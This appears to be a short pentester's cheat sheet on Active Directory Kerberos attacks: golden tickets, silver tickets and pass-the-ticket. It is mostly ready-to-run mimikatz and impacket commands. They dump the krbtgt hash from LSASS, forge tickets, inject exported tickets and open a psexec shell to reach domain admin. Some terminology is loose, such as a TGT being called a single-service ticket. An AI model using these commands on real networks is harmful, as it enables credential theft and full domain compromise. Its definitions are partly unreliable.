golden silver passing ticket

• Silver ticket is more stealth and discreet; only for target service

• Golden ticket works for any kerberos service

Description of terms:

• TGT: ticket to a service account issued by the KDC and can only access that service.

• KRBTGT: service account in KDC; issues all TGTs. If possible to impersonate this account and create a golden ticket, we have ability to create a service ticket for any service

Golden Ticket

using mimikatz

# dump hash and SID
lsadump::lsa /inject /name: krbtgt

# create ticket golden
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500

# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd

using impacket

impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
export KRB5CCNAME=FILE.cache
impacket-psexec DOMAIN/USER@DOMAIN -k -no-pass
# can try impacket-secretsdump

Silver Ticket

mimikatz

# dump
lsadump::lsa /inject /name: [<domain-admin-account> | <service-account>]

# create ticket silver
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103
misc::cmd

Pass-the-ticket

• Can be used for dumping user credentials inside an AD network

• Can dump the TGT from the LSASS memory (which stores Kerberos ticket as the gatekeeper and accept or reject the credentials provided)

• Gives a .kirbi ticket - can be used to get domain admin

• Allows to escalate to domain admin if you dump a domain admin's ticket and then impersonate that ticket

using mimikatz

# exports all .kirbi to current directory
sekurlsa::tickets /export

# find some admin .kirbi from krbtgt
kerberos::ptt TICKET

# to check if ticket is working
> klist